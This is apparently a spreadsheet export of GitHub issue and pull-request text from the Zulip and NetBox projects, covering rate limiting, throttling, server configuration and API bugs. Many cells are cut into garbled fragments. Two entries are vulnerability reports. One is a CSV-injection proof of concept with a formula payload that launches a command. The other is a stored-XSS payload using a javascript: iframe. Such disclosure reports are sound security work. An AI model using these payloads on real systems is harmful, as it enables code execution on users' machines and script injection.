    <t>&gt; So does this mean that if someone spams our server and triggers the rate limit the entire service is blocked to everyone? Generally no, our primary rate limits consider details like the IP. Closing, as I don't think we identified a concrete change to make in response to this report. The main issue seems to have been the use of a gmail account to send email, which is not recommended in production because of its very low rate limits.</t>
  </si>
  <si>
    <t>You can disable or clear rate limiting as documented here: https://zulip.readthedocs.io/en/latest/production/security-model.html#rate-limiting. Is it possible that you attempted sending hundreds of emails prior to getting that error?</t>
  </si>
  <si>
    <t>Please stop by https://chat.zulip.org/#narrow/stream/31-production-help/topic/Unable.20to.20send.20mail.20.2324269/near/1501528 ; this will be easier to investigate more interactively. I'd like you to share precisely the sequence of events in the setup of this server -- one doesn't get a rate limit counter that high without something occurring a lot of times. So either there's a bug resulting in some automated process doing that, or something else going on. (Also it sounds like you have two problems -- one, with sending the invitation email, should be investigated via `/var/log/zulip/` and your mail server's logs; the other, with rate limiting, is definitely something else).</t>
  </si>
  <si>
    <t>pushing updates</t>
  </si>
  <si>
    <t>(Just pushing updates is not enough to indicate to reviewers whether a PR is ready for the next round of feedback.)</t>
  </si>
  <si>
    <t>Diving in code I found that is smokescreen proxy (written in golang), which prevents SSRF attacks. Now I need to find how to allow traffic to my private endpoints. I found something in [documentation](https://zulip.readthedocs.io/en/6.1/production/deployment.html#customizing-the-outgoing-http-proxy), but I not understand how to configure it.</t>
  </si>
  <si>
    <t>Nice work. Tested against 6x CPU throttling on Chrome, and this is looking like a solid improvement.</t>
  </si>
  <si>
    <t>Hey @yogesh-sirsat, I tested it again, and it is working as expected. You can use network throttling and set it to a lower value to test. With the fast condition, I believe there is a race where the file uploads quickly before the cancel button is executed. However, you can still observe this behaviour if you try to upload larger files. Could you please review it again? Thanks :). &lt;br&gt;. ![upload_banner](https://github.com/zulip/zulip/assets/66828942/11f5ecce-fa7f-469c-a702-127f5a8baabf).</t>
  </si>
  <si>
    <t>updates:. * Moved the code to `browser_history.js`. * Switched to throttling instead of debounce, as this ensures we call the function in a timely manner. * Added another call to `update_selection` which is used when manually setting the narrow position, and used `flush()` to ensure this call happens without any delay</t>
  </si>
  <si>
    <t>Thanks @nivadis but I'm closing as this has not been discussed in #backend in chat.zulip.org as a change like this should be, and I think the naming proposal would be a regression -- this clears rate limits, not adds them.</t>
  </si>
  <si>
    <t>server-to-client push</t>
  </si>
  <si>
    <t>Feel free to stop by chat.zulip.org to discuss testing Zulip's scalability, but I'm closing this as not an issue as the main thing here is the fact that we use longpolling for server-to-client push.</t>
  </si>
  <si>
    <t>Can you check what the user experience feels like when loading this page with a few thousand users? Use `manage.py populate_db --help` to see how to create thousands of users in a development environment... and maybe set some throttling of network quality in your browser developer tools. (We might want to exclude the avatars from the pills if it is really slow... or decide to abandon the project entirely)</t>
  </si>
  <si>
    <t>@kuv2707 posted a next comment; as a side note, you should always post a top-level comment with a detailed update on the changes when you're ready for a next review on something; that habit is super helpful in getting timely reviews on you work. (GitHub doesn't notify anyone if you just push updates, so it's by chance that I came back to this PR today)</t>
  </si>
  <si>
    <t>&gt; The issue was entirely operator error, but perhaps zulip could do a correctness lint on `zulip.conf` and provide a diagnostic if the stated postgres version disagrees with the actual postgres version. We do this, starting in a472667ca1d27fbabba6d12ac438e01fa11ab445, in Zulip Server 8.0. If I change my `/etc/zulip/zulip.conf`s value of `postgresql.version` from 16 to, say, 14, and attempt to upgrade, I get:. ```. 2024-03-20 19:04:42.023 CRIT [] PostgreSQL version mismatch: 16 (running) vs 14 (configured). 2024-03-20 19:04:42.407 INFO [] /etc/zulip/zulip.conf claims that Zulip is running PostgreSQL. 14, but the server is connected to a PostgreSQL running. version 16. Check the output from pg_lsclusters to verify. which clusters are running, and update /etc/zulip/zulip.conf to match. In general, this results from manually upgrading PostgreSQL; you. should follow our instructions for using our tool to do so:. https://zulip.readthedocs.io/en/stable/production/upgrade.html#upgrading-postgresql. Traceback (most recent call last):. File "/home/zulip/deployments/2024-03-20-19-04-29/scripts/lib/upgrade-zulip-stage-2", line 251, in &lt;module&gt;. subprocess.check_call(. File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['/home/zulip/deployments/2024-03-20-19-04-29/scripts/lib/check-database-compatibility']'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We suggest upgrading all of the way to the latest version of Zulip.</t>
  </si>
  <si>
    <t>&gt; One thing I would like to hear more about (in the commit message, if nowhere else) is why we're using Redis for this. Most of the time, when we want to store something that we reference across processes, we use PostgreSQL. Why Redis, here? @alexmv Hmm the idea was that this is a pretty transient data structure, and we've sometimes used redis for that. like for rate limiting or for the transient authentication state in social auth flows. And it's a "single row only" kind of data that doesn't require a db table for storing many rows. I wouldn't mind tweaking this to just use a db table if that feels like it'll be significantly cleaner.</t>
  </si>
  <si>
    <t>It looks some merged PR might have removed the `message_lists` import here but didn't create any conflicts which resulted in [error in your screenshots](https://github.com/zulip/zulip/pull/29383#issuecomment-2079891718). I tested this by throttling network upload / download to 30kbps and pressing left arrow immediately after sending a message. This results in message still being in local echo when it is edited and then being updated soon when we receive acknowledgement from the server.</t>
  </si>
  <si>
    <t>**Updates**:. - Updated for review feedback above:. - The `code` key is documented like the other mandatory keys (`msg` and `result`). - The new feature level 76 API changelog entry to just note the `code` key always being present and default value. - Added a header for the common error response section so that the **Changes** entry for the main description reads more clearly. It's also nice to have a header to link to for this section in the API changelog. - Updated API changelog feature level 76 to have "Error handling" to start the entry vs "All REST API endpoints" as that seemed clearer. - I left the API changelog entry for feature level 167 (about the `ignored_parameters_unsupported`) to start with "All REST API endpoints" even though it links to the error handling page because that seemed a better fit there. - Added a commit for feature level 36 rate limit error documentation, which really just updates those to better match our current conventions. See screenshots below. **Updated screenshots**:. &lt;details&gt;. &lt;summary&gt;API changelog updates&lt;/summary&gt;. [Current documentation](https://zulip.com/api/changelog). ![Screenshot from 2024-06-18 14-07-41](https://github.com/zulip/zulip/assets/63245456/4c9c0226-e80f-43ef-85ec-61b828f62d93). ![Screenshot from 2024-06-18 14-08-00](https://github.com/zulip/zulip/assets/63245456/35ee7794-4f48-4851-96f5-970dacb3116f). &lt;/details&gt;. &lt;details&gt;. &lt;summary&gt;Error handling documentation&lt;/summary&gt;. [Current documentation](https://zulip.com/api/rest-error-handling). ![Screenshot from 2024-06-18 14-08-47](https://github.com/zulip/zulip/assets/63245456/6f152189-3088-407a-bee0-9a693e4c32b7). ![Screenshot from 2024-06-18 14-09-02](https://github.com/zulip/zulip/assets/63245456/3861233e-a50f-43b5-9ab1-03c3326d7893). ![Screenshot from 2024-06-18 14-09-14](https://github.com/zulip/zulip/assets/63245456/34b06ca7-a4a9-4d9e-8e51-e67f9d3e89d0). &lt;/details&gt;</t>
  </si>
  <si>
    <t>Yeah, this migration only has like 3 files left, it makes sense for me to review. Pushed a cleanup to how the thunks are managed to avoid polluting helpers with the `| None` type that don't need to be called at all, and marked to merge once CI passes. We'll likely want to use the same technique for the `update_subscriptions_backend` function; it should clean that up too.</t>
  </si>
  <si>
    <t>CCEPT = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'.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t>
  </si>
  <si>
    <t>issue</t>
  </si>
  <si>
    <t>'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'.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 'relati</t>
  </si>
  <si>
    <t>ews/generic/base.py"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t>
  </si>
  <si>
    <t>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'gunicorn/1</t>
  </si>
  <si>
    <t>ges/netaddr/ip/__init__.py"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t>
  </si>
  <si>
    <t>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gunicorn.so</t>
  </si>
  <si>
    <t>Query server error: cannot switch EUI versions using copy constructor; ### Issue type: bug report. **Python version:** 2.7.5. **NetBox version:** 2.1.1. &lt;!--. If filing a bug, please record the exact steps taken to reproduce. the bug and any errors messages that are generated. --&gt;. Querying prefixes returns following server error:. ```. &lt;class 'django.core.exceptions.ValidationError'&gt;. [u'cannot switch EUI versions using copy constructor!']. ```. **Example request**. ```. Request Headers. GET /search/?q=1.2.3.4 HTTP/1.1. Host: redacted. Connection: keep-alive. Cache-Control: max-age=0. Upgrade-Insecure-Requests: 1. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8. Accept-Encoding: gzip, deflate, br. Accept-Language: en-US,en;q=0.8. Cookie: sessionid=xxx; csrftoken=yyy. Query String Parameters. view parsed. q=1.2.3.4. Response Headers. HTTP/1.1 500 Internal Server Error. Server: nginx/1.10.2. Date: Thu, 03 Aug 2017 06:39:22 GMT. Content-Type: text/html; charset=utf-8. Content-Length: 1636. Connection: keep-alive. Vary: Cookie. X-Frame-Options: SAMEORIGIN. ```. **Debug trace**. ```. Internal Server Error: /search/. ValidationError at /search/. [u'cannot switch EUI versions using copy constructor!']. Request Method: GET. Request URL: https://netbox_redacted/search/?q=1.2.3.4. Django Version: 1.11.1. Python Executable: /usr/bin/python. Python Version: 2.7.5. Python Path: ['/opt/netbox-2.1.1/netbox', '/opt/netbox/netbox', '/usr/bin', '/usr/lib64/python27.zip', '/usr/lib64/python2.7', '/usr/lib64/python2.7/plat-linux2', '/usr/lib64/python2.7/lib-tk', '/usr/lib64/python2.7/lib-old', '/usr/lib64/python2.7/lib-dynload', '/usr/lib64/python2.7/site-packages', '/usr/lib64/python2.7/site-packages/gtk-2.0', '/usr/lib/python2.7/site-packages']. Server time: Thu, 3 Aug 2017 16:28:59 +1000 Installed Applications:. ('d</t>
  </si>
  <si>
    <t>me, rel_obj).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t>
  </si>
  <si>
    <t>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49032)&gt;. wsg</t>
  </si>
  <si>
    <t>CSV Injection - vulnerability; During my research on the IT security of the netbox project I found vulnerability CSV Injection. Vulnerability threatens users who perform data export from the netbox system. This leads to the execution of the code on the victim's system - RCE (Remote Code Execution). . https://www.owasp.org/index.php/CSV_Injection . PoC:. IMPORT:. POST /circuits/providers/import/ HTTP/1.1. Host: X. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. Accept-Language: pl,en-US;q=0.7,en;q=0.3. Accept-Encoding: gzip, deflate. Referer: X/circuits/providers/import/. Cookie: csrftoken=Pxk3EKScaTdrI85RsUlkX8CBx0BUIqyZT0LHpfe4qNomkfNJ67WojPCtUh0k6IvI; sessionid=z559q18887m5betro2wtae7xmt8wi2fr. Connection: close. Upgrade-Insecure-Requests: 1. Content-Type: application/x-www-form-urlencoded. Content-Length: 161. csrfmiddlewaretoken=62LcTcvOHDkzEqmzqV9iOfThapFKqJsXavcQEHRGXxvugx4r48KmaWT9xG4aO1pG&amp;csv=name%2Cslug%0D%0A%3DSUM%281%2B1%29*cmd%7C%27+%2FC+calc%27%21A0%2C1%0D%0A. HTTP/1.1 200 OK. Date: Tue, 15 Jan 2019 11:32:23 GMT. Server: Apache. Content-Length: 32040. X-Frame-Options: SAMEORIGIN. Vary: Cookie,Origin. Connection: close. Content-Type: text/html; charset=utf-8. EXPORT:. GET /circuits/providers/?export HTTP/1.1. Host: X. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. Accept-Language: pl,en-US;q=0.7,en;q=0.3. Accept-Encoding: gzip, deflate. Referer: X. Cookie: csrftoken=Pxk3EKScaTdrI85RsUlkX8CBx0BUIqyZT0LHpfe4qNomkfNJ67WojPCtUh0k6IvI; sessionid=z559q18887m5betro2wtae7xmt8wi2fr. Connection: close. Upgrade-Insecure-Requests: 1. HTTP/1.1 200 OK. Date: Tue, 15 Jan 2019 11:32:30 GMT. Server: Apache. Content-Length: 919. Content-Disposition: attachment; filename="netbox_providers.csv". X-Frame-Options: SAMEORIGIN. Vary: Cookie,Origin. Connecti</t>
  </si>
  <si>
    <t>pre-rendering</t>
  </si>
  <si>
    <t>Improve rendering time for API docs; This issue was split off from #2665. ### Environment. * Python version: 3.5.2. * NetBox version: 2.5.7. ### Steps to Reproduce. 1. View the API documentation at `/api/docs/`. ### Expected Behavior. The documentation should be rendered within an acceptable amount of time. ### Observed Behavior. The page takes a noticeably long time to load, even to the point of prompting the user to kill the script running to render the docs. Per @axnsan12 on #2665:. &gt; This is a real issue, with a two-sided cause:. &gt; . &gt; - due to some unfortunate design choices, drf-yasg is quite slow; on my machine the XHR request for the swagger document takes around 10 seconds, and there's not really much that can be done to improve this. &gt; - drf-yasg configures swagger-ui with a default `defaultModelsExpandDepth` of 3, which means the models section at the bottom is fully expanded; this is the main cause of the initial stuttering . &gt; . &gt; You could mitigate the first point by either. &gt; . &gt; a. caching the generated schema. &gt; b. pre-rendering the schema during packaging, deployment or app startup.</t>
  </si>
  <si>
    <t>[BUG] Xss Stored ; Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]. ### Environment. * Python version: 3.7.4. * NetBox version: 2.6.1 -2.6.2. Parameter:. name="comments" [ works on all pages where the parameter is present ]. **PoC**.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-----------------------------57052814523281. Content-Disposition: form-data; name="name". xxx. -----------------------------57052814523281. Content-Disposition: form-data; name="slug". xxx. -----------------------------57052814523281. Content-Disposition: form-data; name="status". 2. -----------------------------57052814523281. Content-Disposition: form-data; name="region". -----------------------------57052814523281. Content-Disposition: form-data; name="facility". -----------------------------57052814523281. Content-Disposition: form-data; name="asn". -----------------------------57052814523281. Content-Disposition: form-data; name="time_zone". -----------------------------57052814523281. Content-Disposition: form-data; name="description". -----------------------------57052814523281. Content-Disposition: form-data; name="tenant_group". -----------------------------57052814523281. Content-Disposition: form-data; name="tenant". -----------------------------57052814523281. Content-Disposition: form-data; name="physical_address". -----------------------------57052814523281. Content-Disposition: form-data; name="shipping_address". -----------------------------57</t>
  </si>
  <si>
    <t>XSS possible through GFM-rendered fields; Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]. ### Environment. * Python version: 3.7.4. * NetBox version: 2.6.1 -2.6.2. Parameter:. name="comments" [ works on all pages where the parameter is present ]. **PoC**. ```.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&lt;snipped&gt;. -----------------------------57052814523281. Content-Disposition: form-data; name="comments". &lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;. -----------------------------57052814523281. Content-Disposition: form-data; name="_create". -----------------------------57052814523281--. ```. ![XssGit](https://user-images.githubusercontent.com/53221919/64010298-c7e7f800-cb19-11e9-810d-f35472b82ecc.PNG). a cve will be requested. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</t>
  </si>
  <si>
    <t>Tags are not working for service creation through API call; * Python version: 3.6.8. * NetBox version: 2.7.1. REST API is not creating services with its related passed tags arguments. ### Trying to create a service and assign a tag to. 1. curl -X POST \. http://cmdbweb/api/ipam/services/ \. -H 'Accept: application/json' \. -H 'Authorization: Token XPTO' \. -H 'Cache-Control: no-cache' \. -H 'Connection: keep-alive' \. -H 'Content-Type: application/json' \. -H 'Host: cmdbweb' \. -H 'Postman-Token: e30af3a9-499c-422e-a69f-25c15edb59b3,cae622cf-2f8d-409d-8c0c-083eca0491e1' \. -H 'User-Agent: PostmanRuntime/7.15.0' \. -H 'accept-encoding: gzip, deflate' \. -H 'cache-control: no-cache' \. -H 'content-length: 114' \. -H 'cookie: csrftoken=9cVlNttRCcRJ1SP7BM7EiYsC3sRISAxekLIp385OL9cf357es3c7LOEAIt1WT2Is' \. -b csrftoken=9cVlNttRCcRJ1SP7BM7EiYsC3sRISAxekLIp385OL9cf357es3c7LOEAIt1WT2Is \. -d '{. 	"name":"testService1",. 	"virtual_machine": 251,. 	"port":"9001",. 	"tag": "['\''tagXPTOSample'\'']",. 	"protocol": 6. 	. }'. - Expected Behavior. Tag should be assigned to its service, but, no tag is assigned, only when adding manually through website. By api it's failing! - What happened instead? API replied a 200 Status Code:. {"id":430,"device":null,"virtual_machine":{"id":251,"url":"http://cmdbweb/api/virtualization/virtual-machines/251/","name":"xptoservice.com.br"},"name":"testService1","port":9001,"protocol":{"value":"tcp","label":"TCP","id":6},"ipaddresses":[],"description":"","custom_fields":{},"created":"2020-01-29","last_updated":"2020-01-29T20:25:43.717031Z"} .</t>
  </si>
  <si>
    <t>pre-rendered</t>
  </si>
  <si>
    <t>Closes #3799: Remove NaturalOrderingManager; ### Fixes: #3799. - Introduce NaturalOrderingField for storing pre-rendered natural ordering-friendly values on models. - Introduce `naturalize()` and `naturalize_interface()` to handle generating values suitable for natural ordering. - Add a NaturalOrderingField (`_name`) to the site, rack, and device models, as well as all device components and component templates. - Extend schema migrations to automatically generate naturalized values for existing objects. - Remove NaturalOrderingManager. - Remove custom ordering logic from InterfaceManager</t>
  </si>
  <si>
    <t>server-side render</t>
  </si>
  <si>
    <t>Render rack elevation SVG with absolute URLs;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3.7.6&lt;!-- Example: 3.6.9 --&gt;. * NetBox version: 2.7.4&lt;!-- Example: 2.7.3 --&gt;. &lt;!--. Describe in detail the new functionality you are proposing. Include any. specific changes to work flows, data models, or the user interface. --&gt;. ### Proposed Functionality. The current SVG rendering for rack elevations results in SVGs containing URLs that are relative, this makes it a slight bit more intricate to embed those SVG images in other systems without moving the image query and embedding into the client's browser. . If instead all `a` tags in the elevation SVGs were rendered with absolute URLs, then the resulting image could be cached and re-served as part of a server-side render in a completely different system, without requiring rewriting the image on the server. &lt;!--. Convey an example use case for your proposed feature. Write from the. perspective of a NetBox user who would benefit from the proposed. functionality and describe how. ---&gt;. ### Use Case. With absolute URLs, rack views could be embedded into systems with different access rules than NetBox itself, letting the server retrieve and display the images in unmodified form to clients, while still easily allowing privileged users to click through into NetBox proper.</t>
  </si>
  <si>
    <t>ll out every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
  </si>
  <si>
    <t>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Accept-Encodi</t>
  </si>
  <si>
    <t>Rate limiting for error emails sent to admins;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3.6.8&lt;!-- Example: 3.6.9 --&gt;. * NetBox version: 2.8.8&lt;!-- Example: 2.7.3 --&gt;. &lt;!--. Describe in detail the new functionality you are proposing. Include any. specific changes to work flows, data models, or the user interface. --&gt;. ### Proposed Functionality. Implement rate-limiting of emails sent to admins based on repeat errors. There are a couple existing Django plugins as an option, or a [custom-built](https://stackoverflow.com/a/25889167) implementation that utilizes the redis cache that would work. redis is the ideal method of tracking the error rate for sending emails as it would ensure NetBox deployments of all kinds (load balanced, k8s, docker, standard install) would all be appropriately rate-limited. I don't think this could be implemented as a NetBox plugin as it would require modifying some of the 'core' Django bits of the NetBox codebase. &lt;!--. Convey an example use case for your proposed feature. Write from the. perspective of a NetBox user who would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t>
  </si>
  <si>
    <t>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thousands) of emails within a very short (1-5 minutes) timespan. - Security scanning systems, during their work, will attempt many malformed and known "bad" requests that will succeed through nginx (or whatever reverse-proxy) and be parsed by Django/NetBox and could create an email flood as in the above case. Having a rate-limiting mechanism to reduce the number of emails sent for the same exact error condition in a short time span would significantly reduce error emails. The emails can be extremely useful for admins to troubleshoot valid issues as it contains full stack traces and other environment variables so disabling the feature entirely would be a loss of vital information for debugging problems. &lt;!--. Note any changes to the database schema necessary to support the new. feature. For example, does the proposal require adding a new model or. field? (Not all new features require database changes.). ---&gt;. ### Database Changes. Depending on implementation there could be changes if any of the configuration was chosen to be exposed through the admin panel, though I think environment variables/configuration parameters would be enough. &lt;!--. List any new dependencies on external libraries or services that this new. feature would introduce. For example, does the proposal require the. installation of a new Python package? (Not all new features introduce new. dependencies.). --&gt;. ### External Dependencies. - redis. - some django plugin, though none of the options ([1](https://github.com/robert-kisteleki/django-email-throttler), [2](https://github.com/krisys/django-error-email-throttle)) I could find were completely up to date or used only the local fileystem to track rate limit</t>
  </si>
  <si>
    <t>Config for Caddy Webserver; ### Change Type. [X] Addition. [ ] Correction. [ ] Deprecation. [ ] Cleanup (formatting, typos, etc.). ### Area. [X] Installation instructions. [ ] Configuration parameters. [ ] Functionality/features. [ ] REST API. [ ] Administration/development. [ ] Other. &lt;!-- Describe the proposed change(s). --&gt;. ### Proposed Changes. Adding a default config for the [Caddy Webserver](https://caddyserver.com) as well, in addition to Apache &amp; NGINX. I've successfully tested this one:. ```. 192.168.15.24 {. route /static* {. uri strip_prefix /static. root * /opt/netbox/netbox/static. file_server. }. @notStatic not path /static*. reverse_proxy @notStatic 127.0.0.1:8001. encode gzip zstd. tls /etc/ssl/certs/netbox.crt /etc/ssl/private/netbox.key. log {. level error. }. }. ```. You'd obviously need to change the IP address in the first line to your own IP or domain, but besides that, it's just as plug-and-play as the others.</t>
  </si>
  <si>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</si>
  <si>
    <t>e_uncaught_exception.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t>
  </si>
  <si>
    <t>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'rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01</t>
  </si>
  <si>
    <t>patch update</t>
  </si>
  <si>
    <t>Change interface name via API patch removes IP address ; ### NetBox version. v2.9.9. ### Python version. 3.7. ### Steps to Reproduce. 1. Have an existing device with a named interface. 2. Make sure the interface has an IP address. 3. Use an API call to change the Name of the interface. Original interface name: "oldInterfaceName0". Submit a patch request via the URL:. `[netbox-api] /dcim/interfaces/[interface-id]/`. Body:. ```. {. "name": "new_interface_name_0". }. ```. 4. The config is accepted but the interface loses it's IP address association. This is unexpected. No other interface config is present, but it appears no other interface or device config changes. . ### Expected Behavior. Changing the interface name using the GUI does not cause any other configuration to change. I expect the same outcome using the api to patch update the interface name. ### Observed Behavior. The IP address is removed from the interface when changing the interface name on a device.</t>
  </si>
  <si>
    <t>Decimal fields conveyed as strings in the REST API; ### NetBox version. v2.11.2. ### Python version. 3.9. ### Steps to Reproduce. The HTTP GET response returns "vcpu" argument as **string**, but it should be a **float**, as requested on [Issue #5975](https://github.com/netbox-community/netbox/issues/5975). **Steps to reproduce:**. 1. Make HTTP GET request to **/api/virtualization/virtual-machines/{id}/**. ---. ### HTTP GET Request. **URI:** https://demo.netbox.dev/api/virtualization/virtual-machines/543/. **Headers:**. Authorization: Token 977e9fb09fbfb2aa67ae06f90655b52edcee01e5. Host: demo.netbox.dev. User-Agent: PostmanRuntime/7.28.0. Accept: */*. Accept-Encoding: gzip, deflate, br. Connection: keep-alive. Content-Type: application/json. ### Expected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null,. "primary_ip": null,. "primary_ip4": null,. "primary_ip6": null,. "vcpus": 10.00,. "memory": 8196,. "disk": 50,. "comments": "",. "local_context_data": null,. "tags": [],. "custom_fields": {},. "config_context": {},. "created": "2021-05-04",. "last_updated": "2021-05-04T02:19:09.726988Z". }. ```. ### Observed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t>
  </si>
  <si>
    <t>patch updates</t>
  </si>
  <si>
    <t>Dependency Security Updates; ### Proposed Changes. Update the following NPM dependencies per dependabot recommendations:. - path-parse@^1.0.7. - trim-newlines@^3.0.1. - glob-parent@^5.1.2. - hosted-git-info@^2.8.9. ### Justification. Security vulnerability patch updates</t>
  </si>
  <si>
    <t>Pre-render</t>
  </si>
  <si>
    <t>Pre-render utilization data for aggregates, prefixes, and IP ranges; ### NetBox version. v3.0.5. ### Feature type. Change to existing functionality. ### Proposed functionality. This issue seeks to explore the feasibility of pre-rendering and recording utilization data for aggregates, prefixes, and IP ranges in the database. Currently, when retrieving a list of prefixes, NetBox will calculate the utilization of each on-demand. As an alternative implementation, we could store these values directly on each object in the database, and update them appropriately as child objects are created and deleted. ### Use case. This would greatly improve performance where utilization data is required. It would also enable us to easily return this information via the REST API as proposed in #7292. ### Database changes. Addition of a `utilization` decimal field on each of the affected models. ### External dependencies. _No response_</t>
  </si>
  <si>
    <t>er is Staff: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
  </si>
  <si>
    <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REMOTE_AUTH_</t>
  </si>
  <si>
    <t>rgs). File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t>
  </si>
  <si>
    <t>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'/api/dcim/interfaces/886/trace/?ren</t>
  </si>
  <si>
    <t>ing custom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
  </si>
  <si>
    <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t>
  </si>
  <si>
    <t>0. max-worker-lifetime = 3600 ; Restart workers after this many seconds. max-worker-lifetime-delta = 110. reload-on-rss = 320 ; Restart workers after this much resident memory. evil-reload-on-rss = 352 ; Restart workers after this much resident memory. worker-reload-mercy = 60 ; How long to wait before forcefully killing workers. listen = 1000 # set max connections to 1000 in uWSGI. die-on-term = true. lazy-apps = true ; safely init worker processes. vacuum = true ; clear environment on exit. disable-logging = true. log-4xx = true. log-5xx = true. strict = false ; Need to disable strict mode when using max-worker-lifetime-delta option. ```. 12. Run uwsgi process `uwsgi --ini uwsgi.ini`. 13. Create new terminal, sudo to root user on VM, create nginx config file `/etc/nginx/nginx.conf`. ```conf. worker_processes 1;. events {. worker_connections 1024;. }. http {. include /etc/nginx/mime.types;. default_type application/octet-stream;. sendfile on;. tcp_nopush on;. keepalive_timeout 65;. gzip on;. server_tokens off;. client_max_body_size 20M;. server {. listen 8080;. location /static/ {. alias /home/testuser01/netbox/netbox/static/;. }. location / {. proxy_read_timeout 180;. proxy_pass http://127.0.0.1:8001;. proxy_set_header X-Forwarded-Host $http_host;. proxy_set_header X-Real-IP $remote_addr;. proxy_set_header X-Forwarded-Proto $scheme;. add_header P3P 'CP="ALL DSP COR PSAa PSDa OUR NOR ONL UNI COM NAV"';. }. location /nginx_status {. stub_status;. allow 127.0.0.1;. }. }. }. ```. 14. Restart nginx service `systemctl restart nginx`. 15. Access netbox from PC, example `http://192.168.122.126:8080/`. 16. Login to netbox, create default device_type, device_role, site, rack. Create API Token. 17. Add multiple devices (199 devices) concurrently by run multi-threaded python client. ```python. import concurrent.futures. import time. from netbox_api.api import netbox_app_api. def create_device(device_name):. print(f'Creating Device {device_name}'). created_device = netbox_app_</t>
  </si>
  <si>
    <t>partial responses</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">ail headers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t>
  </si>
  <si>
    <t>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 The gr</t>
  </si>
  <si>
    <t>ll -y nginx. # Create NGINX Config. sudo mkdir /etc/nginx/sites-available. sudo mkdir /etc/nginx/sites-available/netbox. sudo cp /opt/netbox/contrib/nginx.conf /etc/nginx/sites-available/netbox. # Replace NGINX Default site with NetBox. sudo rm /etc/nginx/sites-enabled/default. sudo ln -s /etc/nginx/sites-available/netbox /etc/nginx/sites-enabled/netbox. # Start NGINX. sudo systemctl restart nginx. ```. But both the "sites-available" and "sites-enabled" directories don't exist. Creating the missing directories and re-running the previously failing steps didn't work. . Now for the fix. I don't know if this is the correct way of handling this, but I replaced the server stanzas of the /etc/nginx/nginx.conf file with the contents of /opt/netbox/contrib/nginx.conf and the site loads fine now. . ```. more nginx.conf. #user nobody;. worker_processes 1;. #error_log logs/error.log;. #error_log logs/error.log notice;. #error_log logs/error.log info;. #pid logs/nginx.pid;. events {. worker_connections 1024;. }. http {. include mime.types;. default_type application/octet-stream;. #log_format main '$remote_addr - $remote_user [$time_local] "$request" '. # '$status $body_bytes_sent "$http_referer" '. # '"$http_user_agent" "$http_x_forwarded_for"';. #access_log logs/access.log main;. sendfile on;. #tcp_nopush on;. #keepalive_timeout 0;. keepalive_timeout 65;. #gzip on;. server {. listen [::]:443 ssl ipv6only=off;. # CHANGE THIS TO YOUR SERVER'S NAME. server_name netbox.&lt;REDACTED&gt;;. ssl_certificate /etc/ssl/certs/netbox.crt;. ssl_certificate_key /etc/ssl/private/netbox.key;. client_max_body_size 25m;. location /static/ {. alias /opt/netbox/netbox/static/;. }. location / {. proxy_pass http://127.0.0.1:8001;. proxy_set_header X-Forwarded-Host $http_host;. proxy_set_header X-Real-IP $remote_addr;. proxy_set_header X-Forwarded-Proto $scheme;. }. }. server {. # Redirect HTTP traffic to HTTPS. listen [::]:80 ipv6only=off;. server_name _;. return 301 https://$host$request_uri;. }. }. ```.</t>
  </si>
  <si>
    <t>pre-render</t>
  </si>
  <si>
    <t>Add HTMX support to ObjectEditView; ### NetBox version. v3.4.3. ### Feature type. New functionality. ### Proposed functionality. Extend the `get()` method of the generic `ObjectEditView` class to support HTMX requests, similar to what we do currently for `ObjectChildrenView` and `ObjectDeleteView`. ### Use case. This lays the foundation for responsive object edit forms. For example, once implemented, selecting a different tab above a group of fields will be able to automatically re-render the appropriate fields for the group (rather than us needing to pre-render all the fields for every group). ### Database changes. _No response_. ### External dependencies. _No response_</t>
  </si>
  <si>
    <t>yserial":"3.5","python-dateutil":"2.8.2","python3-openid":"3.2.0","pytkdocs":"0.16.1","pytz":"2023.4","pyyaml":"6.0.1","pyyaml_env_tag":"0.1","redis":"5.0.1","referencing":"0.33.0","regex":"2023.12.25","requests":"2.31.0","requests-oauthlib":"1.3.1","rich":"13.7.0","rpds-py":"0.17.1","rq":"1.15.1","scp":"0.14.5","sentry-sdk":"1.40.2","setuptools":"59.6.0","sgmllib3k":"1.0.0","six":"1.16.0","social-auth-app-django":"5.4.0","social-authr-core":"4.5.1","sqlparse":"0.4.4","svgwrite":"1.4.3","tablib":"3.5.0","text-unidecode":"1.3","textfsm":"1.1.3","transitions":"0.9.0","ttp":"0.9.5","ttp-templates":"0.3.6","typing_extensions":"4.9.0","tzdata":"2023.4","uritemplate":"4.1.1","urllib3":"2.1.0","watchdog":"3.0.0","webencodings":"0.5.1","wheel":"0.42.0","yamlordereddictloader":"0.4.2"},"nodestore_insert":1707398984.177547,"received":1707398906.31036,"request":{"url":"https://netbox.redacted.net/api/dcim/devices/5710","method":"GET","headers":[["Accept","application/json"],["Accept-Encoding","gzip"],["Authorization","[Filtered]"],["Baggage","sentry-trace_id=52bf9c69cc9c43d7b0e395a84d4e14f5,sentry-sample_rate=1,sentry-transaction=GET%20app_redacted_supportrequest_adminsupportrequest_index,sentry-public_key=8f0f78b02f3e4b86a86ac51f1db040ae,sentry-release=dev-master%407866a59,sentry-environment=prod,sentry-sampled=true"],["Connection","close"],["